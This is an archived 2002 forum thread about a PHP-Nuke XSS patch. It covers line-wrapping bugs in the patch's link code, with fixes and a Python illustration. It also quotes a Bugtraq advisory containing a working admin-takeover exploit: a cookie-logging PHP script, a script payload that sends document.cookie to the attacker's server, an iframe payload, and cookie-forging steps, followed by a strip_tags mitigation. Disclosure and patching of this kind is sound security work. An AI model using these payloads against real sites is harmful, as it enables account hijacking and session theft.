taniself
Cadet
Joined: Jun 19, 2002 Posts: 2 Location: Taiwan
Posted: Thu Jun 20, 2002 3:50 am Post subject: About XSS Exploit Patch
Hail
I just installed this patch on my test pc, and found an issue in the phpbb2 port.
EX:
When a post is written with a URL address without bbcode, it shows:
\
://www.computercops.biz/downloads/PHPNuke/xss_patch_100.txt
But the content is a correct clickable link. Before the patch, it showed this normally:
/downloads/PHPNuke/xss_patch_100.txt
Thanks.
Paul
CastleCops Founder
Joined: Feb 22, 2002 Posts: 27351
Posted: Thu Jun 20, 2002 3:59 am Post subject:
That's odd... this forum has the XSS exploit patch applied and it seems the link is linked correctly. I think I'm not understanding your post. Please advise... because if there is something wrong with the forums patch, I'll fix it right away and re-release.
_________________
Paul Laudanski - http://www.laudanski.com
http://www.linkedin.com/pub/1/49a/17b
taniself
Cadet
Joined: Jun 19, 2002 Posts: 2 Location: Taiwan
Posted: Thu Jun 20, 2002 4:46 am Post subject:
Sorry, it is my mistake. ><
I used the broken line, because the code is too long, so I didn't notice that.
Thanks for the reply, I should now know how to fix this problem.
P.S.
And sorry for my poor English.
Andi
Guest IP: 209.226.*.*
Posted: Fri Jul 05, 2002 8:33 pm Post subject:
I had this problem too. I just discovered it today when I received a nice handful of 404 messages e-mailed my way: http://www.mysite.com/h<br%20/>ttp://www.thesitetheywerelinkingto.com
I've fixed it by making sure the code didn't break up the links & mailto parts up.
btw - thanks for the security fix 
Andi
Guest IP: 216.209.*.*
Posted: Fri Jul 05, 2002 11:33 pm Post subject:
No, that was just an example of how the link looked w/the added br tag & my site url before it. Someone added a URL (without the http:// part) to their post..... and that is how it ended up!
It was easy to fix & all links work now.
thanks,
Andi
Andi
Guest IP: 216.209.*.*
Posted: Sat Jul 06, 2002 12:51 am Post subject:
Paul, I'm just going to copy & paste segments of the relevant parts from xss_patch_100.txt that were giving me problems & what I did to fix them.
$ret = preg_replace("#([\n ])([a-z]+?)://([^\t <\"\n\r]+)#i", "\\1<a href=\"\\2://\\3\" target=\"_blank\">\
\2://\\3</a>", $ret);
You will notice in the code above that the \2... part is separated from the rest of the code. This happens 3 times, so
this segment:
"\\1<a href=\"\\2://\\3\" target=\"_blank\">\
\2://\\3</a>"
I changed to:
"\\1<a href=\"\\2://\\3\" target=\"_blank\">\\2://\\3</a>"
Also this segment further on:
"\\1<a href=\"h
ttp://www.\\2.\\3\\4\" target=\"_blank\">www.\\2.\\3\\4</a>"
I changed to:
"\\1<a href=\"http://www.\\2.\\3\\4\" target=\"_blank\">www.\\2.\\3\\4</a>"
And finally, this:
"\\1<a href=\"mailto:\\2@\
\3\">\\2@\\3</a>"
I changed to:
"\\1<a href=\"mailto:\\2@\\3\">\\2@\\3</a>"
I just made sure that all the lines of code in bbcode.php concerning "a href" weren't broken up & that has fixed it for me. Using nuke 5.5 & phpbb2 port 2.0.4.
No idea why it was causing problems for me but this is what fixed it for my board.
HTH,
Andi
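A worked illustration of the wrapped-literal defect Andi describes, added here as example code (it is not from the patch or from anyone in this thread): it ports the quoted preg_replace to Python, shows how a newline inside the replacement becomes a <br /> inside the anchor once nl2br runs, and scans a constructed bbcode.php sample for "a href" literals left open at end of line. The nl2br step, the sample file and the simplified model of the split string are assumptions.

```python
import re

# Autolink pattern quoted from xss_patch_100.txt in the post above, ported
# from PHP preg_replace to Python re (the /i modifier becomes re.I).
URL_RE = re.compile(r'([\n ])([a-z]+?)://([^\t <"\n\r]+)', re.I)

# Replacement as Andi corrected it: one unbroken line.
FIXED_REPL = r'\1<a href="\2://\3" target="_blank">\2://\3</a>'

# Replacement as it behaves once the line-wrapped patch is pasted in: a real
# newline sits inside the string literal (simplified model of the symptom).
SPLIT_REPL = '\\1<a href="\\2://\\3" target="_blank">\n\\2://\\3</a>'

# Constructed sample of bbcode.php: the wrapped line pair quoted in the post,
# then Andi's single-line fix.
SAMPLE_PHP = r'''$ret = preg_replace("#([\n ])([a-z]+?)://([^\t <\"\n\r]+)#i", "\\1<a href=\"\\2://\\3\" target=\"_blank\">\
\2://\\3</a>", $ret);
$ret = preg_replace("#([\n ])([a-z]+?)://([^\t <\"\n\r]+)#i", "\\1<a href=\"\\2://\\3\" target=\"_blank\">\\2://\\3</a>", $ret);
'''

def nl2br(text):
    """Mimic PHP's nl2br(), which the board applies when rendering a post."""
    return text.replace('\n', '<br />\n')

def render(post_text, repl=FIXED_REPL):
    """Autolink bare URLs, then run the result through nl2br."""
    return nl2br(URL_RE.sub(repl, post_text))

def anchors_intact(html):
    """True when no <a ...>...</a> element has a <br /> or newline inside it."""
    return not any('<br' in a or '\n' in a
                   for a in re.findall(r'<a [^>]*>.*?</a>', html, re.S))

def unescaped_quote_count(line):
    """Count double quotes not preceded by a backslash (PHP string syntax)."""
    count, i = 0, 0
    while i < len(line):
        if line[i] == '\\':
            i += 2            # skip the escaped character
            continue
        count += line[i] == '"'
        i += 1
    return count

def find_split_href_literals(php_source):
    """1-based line numbers where an 'a href' string literal is still open at
    end of line, i.e. it was wrapped onto the next line (Andi's manual check)."""
    return [n for n, line in enumerate(php_source.splitlines(), 1)
            if 'a href' in line and unescaped_quote_count(line) % 2 == 1]
```

Running find_split_href_literals over a pasted copy of bbcode.php lists exactly the lines that need to be rejoined before the board will emit clean links.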
sixonetonoffun
Private
Joined: Jun 04, 2002 Posts: 43 Location: USA
Posted: Thu Aug 15, 2002 5:39 pm Post subject: PHP-Nuke v5.6 - Users can compromise admin accts
Imagine this "Breaking News" should be posted for fun... personally I disabled PM's in Nuke way back.
Code:
From: delusi0n@bellsouth.net (<-delusion->)
To: bugtraq@securityfocus.com, webappsec@secuirtyfocus.com
Tested on PHP-Nuke v5.6 with Mozilla on Linux
(should work on past versions and on most browsers)
Impact:
---------------------------------------------
Allows any user to get admin access to a PHP-Nuke site.
Summary:
----------------------------------------------
Due to a XSS flaw in PHPNuke's Private Messaging module, users can send messages with html code that will be executed without any filtering. In old PHPNuke versions XSS allowed theft of cookies which stored passwords in base64 encoding. Well PHPNuke version 5.6 encrypts the passwds in md5 before it encodes it into base64 and puts it into a cookie. This made stolen cookies useless if the attacker just tried decoding the base64 encrypted pass, because he just got the MD5 encrypted pass.
Since PHP Nuke encrypts passes in md5 and then matches the encrypted pass with the encrypted one in the database, I was able to use the md5 encrypted pass I got from the stolen cookie to authenticate myself.
PHPNuke sets cookies by base64 encoding a string that looks like this:
username:md5_encrypted_pass:lang
Since I can get the md5_encrypted pass all I have to do is launch a script that base64 encodes a string like the one above, and sets it as a cookie on my box.
Exploit:
-------------------------------------------------
For this exploit to work, you must create the following files in your web server's directory.
cookie.php containing this:
<?
$fp = fopen("cookie.txt","a");
fputs($fp, $cookie);
fclose($fp);
print "Message Not Found!"; /* this is so the admin doesn't get scared. and thinks it's some bug. */
?>
test.php containing:
<?
$admin = base64_encode("decoded_string") ;
setcookie("admin","$admin",time()+2592000);
?>
You will find out what to replace decoded_string with..
1. Send an appealing private message to admin containing
<script>document.location.replace('http://yourserver/cookie.php?cookie='+document.cookie);</script>
2. Wait awhile until the admin checks the message then check cookie.txt on yer server.
3. From cookie.txt.. copy the encrypted text after admin= and before the ;
4. go to http://www.isecurelabs.com/base64.php paste the copied text, click decode it should give u a string like this:
username:md5_encrypted_passwd:language (language may be blank).
5. paste the decoded string into test.php like so.
<?
$admin = base64_encode("paste decoded string here");
setcookie("admin","$admin",time()+2592000);
?>
6. Login as any user on the site
7. send private message to self containing:
<iframe src="http://yerserver/test.php"></iframe>
Open the message and a cookie will now be set on yer box, but it will be configured with your server's URL. So all u gotta do is replace yer url wit the nuked site.
8. for mozilla edit cookies.txt in yer ~/.mozilla/someprofile/something/ directory replace the url of yer server to the nuked site, for other browsers just find the Cookie from your server and edit it so instead of showing your url it shows the url of the nuked site.
9. restart yer browser (close and open up again). go back into the nuked site and you are now admin. :D
Temp Solution:
-------------------------------------------------
Edit reply.php in /modules/Private_Messages/ and make $message be stripped of html tags.
Go to line 75 in reply.php and add this line:
$message = strip_tags($message, '
');
That will remove any html tags that aren't or . So it will prevent the XSS.
-------------------------------------------------
NOTE: I wasn't able to contact the php nuke person, I couldn't find an email on their site, and when I signed up for membership I never got the password, so if u can, let them know asap so they can fix this.
Another Vulnerability Brought to you by,
delusion
http://digital-delusions.dyn.ee
IP: 65.168.*.*
Guest
Posted: Thu Aug 15, 2002 8:18 pm Post subject:
Nuke 5.6 contains Splatt forums for Private Messaging.
sixonetonoffun
Private
Joined: Jun 04, 2002 Posts: 43 Location: USA
Posted: Fri Aug 16, 2002 1:49 am Post subject:
At any rate doesn't really seem like anything new to me.
sixonetonoffun
Private
Joined: Jun 04, 2002 Posts: 43 Location: USA
Posted: Fri Aug 16, 2002 3:15 am Post subject:
Figured it went along with the general topic better than posting a new one.
Maybe it stirs up some interest in nuke security? They seem to be running through the Blogs and shopping carts lately.